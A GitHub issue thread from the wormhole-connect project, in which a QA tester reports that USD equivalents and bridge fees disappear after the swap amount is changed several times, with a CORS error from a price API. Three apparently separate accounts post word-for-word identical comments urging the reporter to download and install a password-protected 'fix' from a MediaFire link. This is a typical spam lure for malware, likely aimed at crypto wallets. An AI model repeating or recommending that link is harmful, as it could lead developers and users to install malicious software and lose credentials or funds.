### ISSUE TITLE
[QA] USD equivalent and Bridge fees are not displayed after changing amount several times

### ISSUE THREAD

**Issue by tsadovska** [wormhole-foundation/wormhole-connect#2474]
## Describe the current behavior in detail
Checked on https://wormhole-connect-mainnet.netlify.app/ with macOS Sonoma 14.5 and Google Chrome Version 128.0.6613.85 (Official Build) (arm64).

Steps:
1. Prepare to swap SOL from Solana (Phantom) to WBTC on Ethereum (MetaMask)
2. Enter Amount, 0.1
3. Change amount several times, in my case 0.1 -> 0.0001 -> 0.1 -> 0.0002
4. Check if USD equivalent and Bridge fee are not displayed 

Actual result: USD equivalent and Bridge fee are not displayed.
Expected result: USD equivalent and Bridge fee are displayed.

## Notes/ Attachments
Similar issue: https://github.com/wormhole-foundation/wormhole-connect/issues/2471 [QA] USD equivalent and Bridge fees are not displayed after returning to "Bridge assets" screen.

Error appears in Console: 

`Access to fetch at 'https://api.coingecko.com/api/v3/simple/price?ids=ethereum,ethereum,usd-coin,wrapped-bitcoin,tether,dai,binance-usd,matic-network,matic-network,ethereum,usd-coin,binancecoin,binancecoin,usd-coin,avalanche-2,avalanche-2,usd-coin,ethereum,fantom,fantom,usd-coin,celo,moonbeam,moonbeam,solana,solana,usd-coin,sui,aptos,ethereum,ethereum,usd-coin,ethereum,ethereum,usd-coin,ethereum,ethereum,ethereum,usd-coin,wrapped-steth,wrapped-steth,wrapped-steth,wrapped-steth,wrapped-steth,klay-token,wrapped-klay,pyth-network,ethereum,ethereum,ethereum,ethereum,okb,okb,mantle,mantle&vs_currencies=usd' from origin 'https://wormhole-connect-mainnet.netlify.app' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.
`

https://github.com/user-attachments/assets/7d6e2e54-4066-4675-a212-336e37a8c37b

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by danielisaacgeslin** [comment]
related https://github.com/wormhole-foundation/wormhole-connect/issues/2526

**Comment by yuli-ferna** [comment]
Should be fixed :) @tsadovska 
https://preview.portalbridge.com/b1f3c5115d/

<img width="673" alt="image" src="https://github.com/user-attachments/assets/4272883b-e3f9-4042-96c8-53792fa1bc49">
